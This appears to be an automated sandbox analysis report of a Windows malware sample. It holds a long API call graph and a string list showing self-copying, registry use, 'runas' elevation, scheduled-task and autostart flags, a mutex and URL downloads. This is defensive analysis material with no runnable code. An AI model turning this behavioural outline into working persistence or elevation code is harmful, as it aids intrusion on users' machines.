413580 59 API calls 39954->40391 39956 41ae82 39957 415c10 59 API calls 39956->39957 39958 41aebc 39957->39958 40392 413580 59 API calls 39958->40392 39960 41aec8 39961 415c10 59 API calls 39960->39961 39962 41af02 39961->39962 40393 413580 59 API calls 39962->40393 39964 41af0e 39965 415c10 59 API calls 39964->39965 39966 41af48 39965->39966 40394 413580 59 API calls 39966->40394 39968 41af54 39969 415c10 59 API calls 39968->39969 39970 41af8e 39969->39970 40395 413580 59 API calls 39970->40395 39972 41af9a 39973 415c10 59 API calls 39972->39973 39974 41afd4 39973->39974 40396 413580 59 API calls 39974->40396 39976 41afe0 40397 413100 59 API calls 39976->40397 39978 41b001 40398 413580 59 API calls 39978->40398 39980 41b025 40399 413100 59 API calls 39980->40399 39982 41b03c 40400 413580 59 API calls 39982->40400 39984 41b059 40401 413100 59 API calls 39984->40401 39986 41b070 40402 413580 59 API calls 39986->40402 39988 41b07c 40403 413100 59 API calls 39988->40403 39990 41b093 40404 413580 59 API calls 39990->40404 39992 41b09f 40405 413100 59 API calls 39992->40405 39994 41b0b6 40406 413580 59 API calls 39994->40406 39996 41b0c2 40407 413100 59 API calls 39996->40407 39998 41b0d9 40408 413580 59 API calls 39998->40408 40000 41b0e5 40409 413100 59 API calls 40000->40409 40002 41b0fc 40410 413580 59 API calls 40002->40410 40004 41b108 40006 41b130 40004->40006 40411 41cdd0 59 API calls 40004->40411 40007 40ef50 58 API calls 40006->40007 40008 41b16e 40007->40008 40010 41b1a5 GetUserNameW 40008->40010 40412 412de0 59 API calls 40008->40412 40011 41b1c9 40010->40011 40413 412c40 40011->40413 40013 41b1d8 40420 412bf0 59 API calls 40013->40420 40015 41b1ea 40421 40ecb0 60 API calls 2 library calls 40015->40421 40017 41b2f5 40424 4136c0 59 API calls 40017->40424 40019 41b308 40425 40ca70 59 API calls 40019->40425 40021 41b311 40426 4130b0 59 API calls 40021->40426 40023 412c40 59 API calls 40038 41b1f3 40023->40038 40024 41b322 40427 40c740 120 API calls 4 library calls 40024->40427 40026 412900 60 API calls 40026->40038 40027 41b327 40428 4111c0 169 API calls 2 library calls 40027->40428 40030 41b33b 40429 41ba10 LoadCursorW RegisterClassExW 40030->40429 40032 41b343 40430 41ba80 CreateWindowExW ShowWindow UpdateWindow 40032->40430 40034 413100 59 API calls 40034->40038 40035 41b34b 40039 41b34f 40035->40039 40431 410a50 65 API calls 40035->40431 40038->40017 40038->40023 40038->40026 40038->40034 40422 413580 59 API calls 40038->40422 40423 40f1f0 59 API calls 40038->40423 40039->39912 40040 41b379 40432 413100 59 API calls 40040->40432 40042 41b3a5 40433 413580 59 API calls 40042->40433 40044 41b48b 40439 41fdc0 CreateThread 40044->40439 40046 41b49f GetMessageW 40047 41b4ed 40046->40047 40048 41b4bf 40046->40048 40051 41b502 PostThreadMessageW 40047->40051 40052 41b55b 40047->40052 40049 41b4c5 TranslateMessage DispatchMessageW GetMessageW 40048->40049 40049->40047 40049->40049 40055 41b510 PeekMessageW 40051->40055 40053 41b564 PostThreadMessageW 40052->40053 40054 41b5bb 40052->40054 40056 41b570 PeekMessageW 40053->40056 40054->40039 40061 41b5d2 CloseHandle 40054->40061 40057 41b546 WaitForSingleObject 40055->40057 40058 41b526 DispatchMessageW PeekMessageW 40055->40058 40059 41b5a6 WaitForSingleObject 40056->40059 40060 41b586 DispatchMessageW PeekMessageW 40056->40060 40057->40052 40057->40055 40058->40057 40058->40058 40059->40054 40059->40056 40060->40059 40060->40060 40061->40039 40066 41b3b3 40066->40044 40434 41c330 59 API calls 40066->40434 40435 41c240 59 API calls 40066->40435 40436 41b8b0 59 API calls 40066->40436 40437 413260 59 API calls 40066->40437 40438 41fa10 CreateThread 40066->40438 40741 427e0e 40067->40741 40069 427f4c 40069->39734 40070->39707 40071->39711 40072->39718 40076->39737 40077->39743 40078->39745 40079->39749 40080->39750 40083 428c9d 40081->40083 40084 425179 40083->40084 40085 428cbb 40083->40085 40090 43b813 40083->40090 40084->39754 40087 432553 TlsSetValue 40084->40087 40085->40083 40085->40084 40098 4329c9 Sleep 40085->40098 40087->39757 40088->39761 40089->39758 40091 43b81e 40090->40091 40097 43b839 40090->40097 40092 43b82a 40091->40092 40091->40097 40099 425208 58 API calls __getptd_noexit 40092->40099 40094 43b849 RtlAllocateHeap 40095 43b82f 40094->40095 40094->40097 40095->40083 40097->40094 40097->40095 40100 42793d DecodePointer 40097->40100 40098->40085 40099->40095 40100->40097 40101->39777 40102->39778 40103->39769 40104->39785 40105->39790 40106->39801 40107->39796 40108->39796 40110 424308 40109->40110 40115 424168 40110->40115 40114 424323 40114->39804 40116 424182 _memset ___raise_securityfailure 40115->40116 40117 4241a2 IsDebuggerPresent 40116->40117 40123 4329ec SetUnhandledExceptionFilter UnhandledExceptionFilter 40117->40123 40120 424266 ___raise_securityfailure 40124 42a77e 40120->40124 40121 424289 40122 4329d7 GetCurrentProcess TerminateProcess 40121->40122 40122->40114 40123->40120 40125 42a786 40124->40125 40126 42a788 IsProcessorFeaturePresent 40124->40126 40125->40121 40128 42ab9c 40126->40128 40131 42ab4b 5 API calls ___raise_securityfailure 40128->40131 40130 42ac7f 40130->40121 40131->40130 40133 43aeb8 EncodePointer 40132->40133 40133->40133 40134 43aed2 40133->40134 40134->39808 40136 40cf32 _memset __write_nolock 40135->40136 40137 40cf4f InternetOpenW 40136->40137 40138 415c10 59 API calls 40137->40138 40139 40cf8a InternetOpenUrlW 40138->40139 40140 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 40139->40140 40148 40cfb2 40139->40148 40442 4156d0 40140->40442 40142 40d000 40143 4156d0 59 API calls 40142->40143 40144 40d049 40143->40144 40144->40148 40461 413010 59 API calls 40144->40461 40146 40d084 40146->40148 40462 413010 59 API calls 40146->40462 40148->39814 40467 41ccc0 40149->40467 40153 41cc50 59 API calls 40152->40153 40154 41d36c 40153->40154 40155 41a04d 40154->40155 40474 41d740 59 API calls 40154->40474 40155->39826 40155->39831 40158 413ab2 40157->40158 40159 413ad0 GetModuleFileNameW PathRemoveFileSpecW 40157->40159 40160 413b00 40158->40160 40161 413aba 40158->40161 40167 418400 40159->40167 40475 44f23e 59 API calls 2 library calls 40160->40475 40162 423b4c 59 API calls 40161->40162 40164 413ac7 40162->40164 40164->40159 40476 44f1bb 59 API calls 3 library calls 40164->40476 40168 418437 40167->40168 40172 418446 40167->40172 40168->40172 40477 415d50 59 API calls ___crtGetEnvironmentStringsW 40168->40477 40169 4184b9 40169->39839 40172->40169 40478 418d50 59 API calls 40172->40478 40479 431781 40173->40479 40497 42f7c0 40176->40497 40179 411d20 _memset 40180 411d40 RegQueryValueExW RegCloseKey 40179->40180 40181 411d8f 40180->40181 40182 415c10 59 API calls 40181->40182 40183 411dbf 40182->40183 40184 411dd1 lstrlenA 40183->40184 40185 411e7c 40183->40185 40499 413520 59 API calls 40184->40499 40187 411e94 6 API calls 40185->40187 40189 411ef5 UuidCreate UuidToStringW 40187->40189 40188 411df1 40190 411e3c PathFileExistsW 40188->40190 40193 411e00 40188->40193 40191 411f36 40189->40191 40190->40185 40192 411e52 40190->40192 40191->40191 40195 415c10 59 API calls 40191->40195 40194 411e6a 40192->40194 40197 414690 59 API calls 40192->40197 40193->40188 40193->40190 40198 4121d1 40194->40198 40196 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 40195->40196 40200 411fce 40196->40200 40202 411f98 40196->40202 40197->40194 40198->39868 40199 415c10 59 API calls 40199->40200 40201 415c10 59 API calls 40200->40201 40203 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 40201->40203 40202->40199 40203->40198 40204 41207c _memset 40203->40204 40205 412095 6 API calls 40204->40205 40206 412115 _memset 40205->40206 40207 412109 40205->40207 40209 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 40206->40209 40500 413260 59 API calls 40207->40500 40210 4121b2 40209->40210 40211 4121aa GetLastError 40209->40211 40212 4121c0 WaitForSingleObject 40210->40212 40211->40198 40212->40198 40212->40212 40214 42f7c0 __write_nolock 40213->40214 40215 41222d 7 API calls 40214->40215 40216 4122bd K32EnumProcesses 40215->40216 40217 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 40215->40217 40218 4122d3 40216->40218 40219 4122df 40216->40219 40217->40216 40218->39842 40220 412353 40219->40220 40221 4122f0 OpenProcess 40219->40221 40220->39842 40222 412346 CloseHandle 40221->40222 40223 41230a K32EnumProcessModules 40221->40223 40222->40220 40222->40221 40223->40222 40224 41231c K32GetModuleBaseNameW 40223->40224 40501 420235 40224->40501 40226 41233e 40226->40222 40227 412345 40226->40227 40227->40222 40229 420c62 _malloc 58 API calls 40228->40229 40230 40ef6e _memset 40229->40230 40231 40efdc 40230->40231 40232 420c62 _malloc 58 API calls 40230->40232 40231->39848 40232->40230 40234 413f05 40233->40234 40238 413eae 40233->40238 40235 413fb1 40234->40235 40236 413f18 40234->40236 40517 44f23e 59 API calls 2 library calls 40235->40517 40239 413fbb 40236->40239 40240 413f2d 40236->40240 40241 413f3d ___crtGetEnvironmentStringsW 40236->40241 40238->40234 40245 413ed4 40238->40245 40518 44f23e 59 API calls 2 library calls 40239->40518 40240->40241 40516 416760 59 API calls 2 library calls 40240->40516 40241->39848 40247 413ed9 40245->40247 40248 413eef 40245->40248 40514 413da0 59 API calls ___crtGetEnvironmentStringsW 40247->40514 40515 413da0 59 API calls ___crtGetEnvironmentStringsW 40248->40515 40252 413ee9 40252->39848 40253 413eff 40253->39848 40255 4146a9 40254->40255 40256 41478c 40254->40256 40258 4146b6 40255->40258 40259 4146e9 40255->40259 40521 44f26c 59 API calls 3 library calls 40256->40521 40262 414796 40258->40262 40263 4146c2 40258->40263 40260 4147a0 40259->40260 40261 4146f5 40259->40261 40523 44f23e 59 API calls 2 library calls 40260->40523 40275 414707 ___crtGetEnvironmentStringsW 40261->40275 40520 416950 59 API calls 2 library calls 40261->40520 40522 44f26c 59 API calls 3 library calls 40262->40522 40519 413340 59 API calls _memmove 40263->40519 40271 4146e0 40271->39862 40275->39862 40278 40d27d CoInitializeSecurity 40277->40278 40283 40d276 40277->40283 40279 414690 59 API calls 40278->40279 40280 40d2b8 CoCreateInstance 40279->40280 40281 40d2e3 VariantInit VariantInit VariantInit VariantInit 40280->40281 40282 40da3c CoUninitialize 40280->40282 40284 40d38e VariantClear VariantClear VariantClear VariantClear 40281->40284 40282->40283 40283->39888 40285 40d3e2 40284->40285 40286 40d3cc CoUninitialize 40284->40286 40524 40b140 40285->40524 40286->40283 40289 40d3f6 40529 40b1d0 40289->40529 40291 40d422 40292 40d426 CoUninitialize 40291->40292 40293 40d43c 40291->40293 40292->40283 40294 40b140 60 API calls 40293->40294 40296 40d449 40294->40296 40297 40b1d0 SysFreeString 40296->40297 40298 40d471 40297->40298 40299 40d496 CoUninitialize 40298->40299 40300 40d4ac 40298->40300 40299->40283 40302 40b140 60 API calls 40300->40302 40357 40d8cf 40300->40357 40303 40d4d5 40302->40303 40304 40b1d0 SysFreeString 40303->40304 40305 40d4fd 40304->40305 40306 40b140 60 API calls 40305->40306 40305->40357 40307 40d5ae 40306->40307 40308 40b1d0 SysFreeString 40307->40308 40309 40d5d6 40308->40309 40310 40b140 60 API calls 40309->40310 40309->40357 40311 40d679 40310->40311 40312 40b1d0 SysFreeString 40311->40312 40313 40d6a1 40312->40313 40314 40b140 60 API calls 40313->40314 40313->40357 40315 40d6b6 40314->40315 40316 40b1d0 SysFreeString 40315->40316 40317 40d6de 40316->40317 40318 40b140 60 API calls 40317->40318 40317->40357 40319 40d707 40318->40319 40320 40b1d0 SysFreeString 40319->40320 40321 40d72f 40320->40321 40322 40b140 60 API calls 40321->40322 40321->40357 40323 40d744 40322->40323 40324 40b1d0 SysFreeString 40323->40324 40325 40d76c 40324->40325 40325->40357 40533 423aaf GetSystemTimeAsFileTime 40325->40533 40327 40d77d 40535 423551 40327->40535 40332 412c40 59 API calls 40333 40d7b5 40332->40333 40334 412900 60 API calls 40333->40334 40335 40d7c3 40334->40335 40336 40b140 60 API calls 40335->40336 40337 40d7db 40336->40337 40338 40b1d0 SysFreeString 40337->40338 40339 40d7ff 40338->40339 40340 40b140 60 API calls 40339->40340 40339->40357 40341 40d8a3 40340->40341 40342 40b1d0 SysFreeString 40341->40342 40343 40d8cb 40342->40343 40344 40b140 60 API calls 40343->40344 40343->40357 40345 40d8ea 40344->40345 40346 40b1d0 SysFreeString 40345->40346 40347 40d912 40346->40347 40347->40357 40543 40b400 SysAllocString 40347->40543 40349 40d936 VariantInit VariantInit 40350 40b140 60 API calls 40349->40350 40351 40d985 40350->40351 40352 40b1d0 SysFreeString 40351->40352 40353 40d9e7 VariantClear VariantClear VariantClear 40352->40353 40354 40da10 40353->40354 40355 40da46 CoUninitialize 40353->40355 40547 42052a 78 API calls vswprintf 40354->40547 40355->40283 40357->40282 40359->39820 40360->39865 40361->39866 40362->39902 40363->39905 40365 415c66 40364->40365 40367 415c1e 40364->40367 40366 415cff 40365->40366 40369 415c76 40365->40369 40736 44f23e 59 API calls 2 library calls 40366->40736 40367->40365 40374 415c45 40367->40374 40376 415c88 ___crtGetEnvironmentStringsW 40369->40376 40735 416950 59 API calls 2 library calls 40369->40735 40377 414690 59 API calls 40374->40377 40376->39909 40378 415c60 40377->40378 40378->39909 40379->39911 40380->39914 40381->39920 40382->39930 40384 413a90 59 API calls 40383->40384 40385 41294c MultiByteToWideChar 40384->40385 40386 418400 59 API calls 40385->40386 40387 41298d 40386->40387 40387->39933 40388->39938 40389->39946 40390->39952 40391->39956 40392->39960 40393->39964 40394->39968 40395->39972 40396->39976 40397->39978 40398->39980 40399->39982 40400->39984 40401->39986 40402->39988 40403->39990 40404->39992 40405->39994 40406->39996 40407->39998 40408->40000 40409->40002 40410->40004 40411->40006 40412->40008 40414 412c71 40413->40414 40415 412c5f 40413->40415 40418 4156d0 59 API calls 40414->40418 40416 4156d0 59 API calls 40415->40416 40417 412c6a 40416->40417 40417->40013 40419 412c8a 40418->40419 40419->40013 40420->40015 40421->40038 40422->40038 40423->40038 40424->40019 40425->40021 40426->40024 40427->40027 40428->40030 40429->40032 40430->40035 40431->40040 40432->40042 40433->40066 40434->40066 40435->40066 40436->40066 40437->40066 40438->40066 40737 41f130 218 API calls _TranslateName 40438->40737 40439->40046 40738 41fd80 64 API calls 40439->40738 40443 415735 40442->40443 40444 4156de 40442->40444 40445 4157bc 40443->40445 40446 41573e 40443->40446 40444->40443 40454 415704 40444->40454 40466 44f23e 59 API calls 2 library calls 40445->40466 40447 415750 ___crtGetEnvironmentStringsW 40446->40447 40465 416760 59 API calls 2 library calls 40446->40465 40447->40142 40455 415709 40454->40455 40456 41571f 40454->40456 40463 413ff0 59 API calls ___crtGetEnvironmentStringsW 40455->40463 40464 413ff0 59 API calls ___crtGetEnvironmentStringsW 40456->40464 40459 415719 40459->40142 40460 41572f 40460->40142 40461->40146 40462->40148 40463->40459 40464->40460 40465->40447 40468 423b4c 59 API calls 40467->40468 40469 41ccca 40468->40469 40472 41a00a 40469->40472 40473 44f1bb 59 API calls 3 library calls 40469->40473 40472->39823 40472->39824 40474->40155 40477->40172 40478->40172 40482 431570 40479->40482 40483 431580 40482->40483 40484 431586 40483->40484 40489 4315ae 40483->40489 40493 425208 58 API calls __getptd_noexit 40484->40493 40486 43158b 40494 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40486->40494 40491 4315cf wcstoxq 40489->40491 40495 42e883 GetStringTypeW 40489->40495 40492 41a36e lstrcpyW lstrcpyW 40491->40492 40496 425208 58 API calls __getptd_noexit 40491->40496 40492->39857 40493->40486 40494->40492 40495->40489 40496->40492 40498 411cf2 RegOpenKeyExW 40497->40498 40498->40179 40498->40198 40499->40188 40500->40206 40502 420241 40501->40502 40503 4202b6 40501->40503 40510 420266 40502->40510 40511 425208 58 API calls __getptd_noexit 40502->40511 40513 4202c8 60 API calls 3 library calls 40503->40513 40506 4202c3 40506->40226 40507 42024d 40512 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40507->40512 40509 420258 40509->40226 40510->40226 40511->40507 40512->40509 40513->40506 40514->40252 40515->40253 40516->40241 40519->40271 40520->40275 40521->40262 40522->40260 40525 423b4c 59 API calls 40524->40525 40526 40b164 40525->40526 40527 40b177 SysAllocString 40526->40527 40528 40b194 40526->40528 40527->40528 40528->40289 40530 40b1de 40529->40530 40531 40b202 40529->40531 40530->40531 40532 40b1f5 SysFreeString 40530->40532 40531->40291 40532->40531 40534 423add __aulldiv 40533->40534 40534->40327 40548 43035d 40535->40548 40537 42355a 40538 40d78f 40537->40538 40556 423576 40537->40556 40540 4228e0 40538->40540 40688 42279f 40540->40688 40544 40b423 40543->40544 40545 40b41d 40543->40545 40546 40b42d VariantClear 40544->40546 40545->40349 40546->40349 40547->40357 40589 42501f 58 API calls 4 library calls 40548->40589 40550 430363 40552 43038d 40550->40552 40555 430369 40550->40555 40591 428cde 58 API calls 2 library calls 40550->40591 40552->40537 40553 43036e 40553->40537 40555->40552 40590 425208 58 API calls __getptd_noexit 40555->40590 40557 423591 40556->40557 40558 4235a9 _memset 40556->40558 40600 425208 58 API calls __getptd_noexit 40557->40600 40558->40557 40565 4235c0 40558->40565 40560 423596 40601 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40560->40601 40562 4235e9 40592 42fb64 40562->40592 40563 4235cb 40602 425208 58 API calls __getptd_noexit 40563->40602 40565->40562 40565->40563 40567 4235ee 40603 42f803 58 API calls __cftof_l 40567->40603 40569 4235f7 40570 4237e5 40569->40570 40604 42f82d 58 API calls __cftof_l 40569->40604 40571 4242fd __wsopen_nolock 8 API calls 40570->40571 40573 4237ef 40571->40573 40574 423609 40574->40570 40605 42f857 40574->40605 40576 42361b 40576->40570 40577 423624 40576->40577 40578 42369b 40577->40578 40580 423637 40577->40580 40615 42f939 58 API calls 4 library calls 40578->40615 40612 42f939 58 API calls 4 library calls 40580->40612 40581 4236a2 40588 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40581->40588 40616 42fbb4 58 API calls 4 library calls 40581->40616 40583 42364f 40583->40588 40613 42fbb4 58 API calls 4 library calls 40583->40613 40586 423668 40586->40588 40614 42f939 58 API calls 4 library calls 40586->40614 40588->40538 40589->40550 40590->40553 40591->40555 40593 42fb70 _raise 40592->40593 40594 42fba5 _raise 40593->40594 40595 428af7 __lock 58 API calls 40593->40595 40594->40567 40596 42fb80 40595->40596 40597 42fb93 40596->40597 40617 42fe47 40596->40617 40646 42fbab LeaveCriticalSection _doexit 40597->40646 40600->40560 40601->40588 40602->40588 40603->40569 40604->40574 40606 42f861 40605->40606 40607 42f876 40605->40607 40686 425208 58 API calls __getptd_noexit 40606->40686 40607->40576 40609 42f866 40687 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40609->40687 40611 42f871 40611->40576 40612->40583 40613->40586 40614->40588 40615->40581 40616->40588 40618 42fe53 _raise 40617->40618 40619 428af7 __lock 58 API calls 40618->40619 40620 42fe71 __tzset_nolock 40619->40620 40621 42f857 __tzset_nolock 58 API calls 40620->40621 40622 42fe86 40621->40622 40637 42ff25 __tzset_nolock __isindst_nolock 40622->40637 40647 42f803 58 API calls __cftof_l 40622->40647 40623 4242fd __wsopen_nolock 8 API calls 40623->40637 40625 42fe98 40625->40637 40648 42f82d 58 API calls __cftof_l 40625->40648 40626 42ff71 GetTimeZoneInformation 40626->40637 40629 42feaa 40629->40637 40649 433f99 58 API calls 2 library calls 40629->40649 40630 42ffd8 WideCharToMultiByte 40630->40637 40632 42feb8 40650 441667 40632->40650 40634 430010 WideCharToMultiByte 40634->40637 40636 42fed9 ___TypeMatch 40636->40637 40640 42ff0c _strlen 40636->40640 40656 420bed 58 API calls 2 library calls 40636->40656 40637->40623 40637->40626 40637->40630 40637->40634 40638 430157 __tzset_nolock _raise __isindst_nolock 40637->40638 40639 43ff8e 58 API calls __tzset_nolock 40637->40639 40645 423c2d 61 API calls UnDecorator::getZName 40637->40645 40667 420bed 58 API calls 2 library calls 40637->40667 40668 4300d7 LeaveCriticalSection _doexit 40637->40668 40638->40597 40639->40637 40657 428cde 58 API calls 2 library calls 40640->40657 40643 42ff1a _strlen 40643->40637 40658 42c0fd 40643->40658 40645->40637 40646->40594 40647->40625 40648->40629 40649->40632 40651 44167e 40650->40651 40653 44167a 40650->40653 40651->40653 40654 441690 _strlen 40651->40654 40669 44900f 40651->40669 40653->40636 40654->40653 40679 4490de 71 API calls __mbsnbicoll_l 40654->40679 40656->40640 40657->40643 40659 42c116 40658->40659 40660 42c108 40658->40660 40683 425208 58 API calls __getptd_noexit 40659->40683 40660->40659 40663 42c12c 40660->40663 40664 42c127 40663->40664 40685 425208 58 API calls __getptd_noexit 40663->40685 40664->40637 40666 42c11d 40684 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40666->40684 40667->40637 40668->40637 40677 449037 40669->40677 40670 449022 WideCharToMultiByte 40671 44908a 40670->40671 40670->40677 40671->40654 40672 428c96 __calloc_crt 58 API calls 40672->40677 40673 449048 WideCharToMultiByte 40674 449090 40673->40674 40673->40677 40682 420bed 58 API calls 2 library calls 40674->40682 40677->40670 40677->40671 40677->40672 40677->40673 40680 44d0cb 78 API calls 11 library calls 40677->40680 40681 420bed 58 API calls 2 library calls 40677->40681 40679->40654 40680->40677 40681->40677 40682->40671 40683->40666 40684->40664 40685->40666 40686->40609 40687->40611 40715 42019c 40688->40715 40691 4227d4 40723 425208 58 API calls __getptd_noexit 40691->40723 40693 4227d9 40724 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40693->40724 40695 4227e9 MultiByteToWideChar 40696 422804 GetLastError 40695->40696 40697 422815 40695->40697 40725 4251e7 58 API calls 3 library calls 40696->40725 40726 428cde 58 API calls 2 library calls 40697->40726 40698 40d7a3 40698->40332 40701 422810 40730 420bed 58 API calls 2 library calls 40701->40730 40702 42281d 40702->40701 40703 422825 MultiByteToWideChar 40702->40703 40703->40696 40705 42283f 40703->40705 40727 428cde 58 API calls 2 library calls 40705->40727 40706 4228a0 40731 420bed 58 API calls 2 library calls 40706->40731 40709 42284a 40709->40701 40728 42d51e 88 API calls 3 library calls 40709->40728 40711 422866 40711->40701 40712 42286f WideCharToMultiByte 40711->40712 40712->40701 40713 42288b GetLastError 40712->40713 40729 4251e7 58 API calls 3 library calls 40713->40729 40716 4201ad 40715->40716 40719 4201fa 40715->40719 40732 425007 58 API calls 2 library calls 40716->40732 40718 4201da 40718->40719 40734 42495e 58 API calls 6 library calls 40718->40734 40719->40691 40719->40695 40720 4201b3 40720->40718 40733 4245dc 58 API calls 6 library calls 40720->40733 40723->40693 40724->40698 40725->40701 40726->40702 40727->40709 40728->40711 40729->40701 40730->40706 40731->40698 40732->40720 40733->40718 40734->40719 40735->40376 40742 427e1a _raise 40741->40742 40743 428af7 __lock 51 API calls 40742->40743 40744 427e21 40743->40744 40745 427e4f DecodePointer 40744->40745 40748 427eda _doexit 40744->40748 40747 427e66 DecodePointer 40745->40747 40745->40748 40760 427e76 40747->40760 40761 427f28 40748->40761 40750 427f37 _raise 40750->40069 40752 427e83 EncodePointer 40752->40760 40753 427f1f 40754 427b0b _doexit 3 API calls 40753->40754 40756 427f28 40754->40756 40755 427e93 DecodePointer EncodePointer 40759 427ea5 DecodePointer DecodePointer 40755->40759 40757 427f35 40756->40757 40766 428c81 LeaveCriticalSection 40756->40766 40757->40069 40759->40760 40760->40748 40760->40752 40760->40755 40762 427f08 40761->40762 40763 427f2e 40761->40763 40762->40750 40765 428c81 LeaveCriticalSection 40762->40765 40767 428c81 LeaveCriticalSection 40763->40767 40765->40753 40766->40757 40767->40762 40768 4416eb 40769 4416f7 40768->40769 40770 44170a 40768->40770 40797 425208 58 API calls __getptd_noexit 40769->40797 40772 441751 40770->40772 40773 44171c 40770->40773 40799 425208 58 API calls __getptd_noexit 40772->40799 40777 441667 __getenv_helper_nolock 78 API calls 40773->40777 40774 4416fc 40798 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40774->40798 40781 44172b _strlen 40777->40781 40778 441756 40800 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40778->40800 40780 441706 40781->40780 40782 42c0fd _$I10_OUTPUT 58 API calls 40781->40782 40783 44176e 40782->40783 40783->40780 40784 4242fd __wsopen_nolock 8 API calls 40783->40784 40786 441785 _raise _strnlen 40784->40786 40785 4417a4 40801 425208 58 API calls __getptd_noexit 40785->40801 40786->40785 40789 4417ce 40786->40789 40788 4417a9 40802 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 40788->40802 40791 428af7 __lock 58 API calls 40789->40791 40792 4417d5 40791->40792 40793 441667 __getenv_helper_nolock 78 API calls 40792->40793 40794 4417e0 40793->40794 40803 4417fd LeaveCriticalSection _doexit 40794->40803 40795 4417b4 _raise 40797->40774 40798->40780 40799->40778 40800->40780 40801->40788 40802->40795 40803->40795

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                      • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                      • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0068B600,?), ref: 0041A0BB
                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                      • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                      • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                      • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                    • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                    • API String ID: 2957410896-3144399390
                                                                                                                                                    • Opcode ID: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                                                                                                                                                    • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                    • Opcode Fuzzy Hash: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                                                                                                                                                    • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
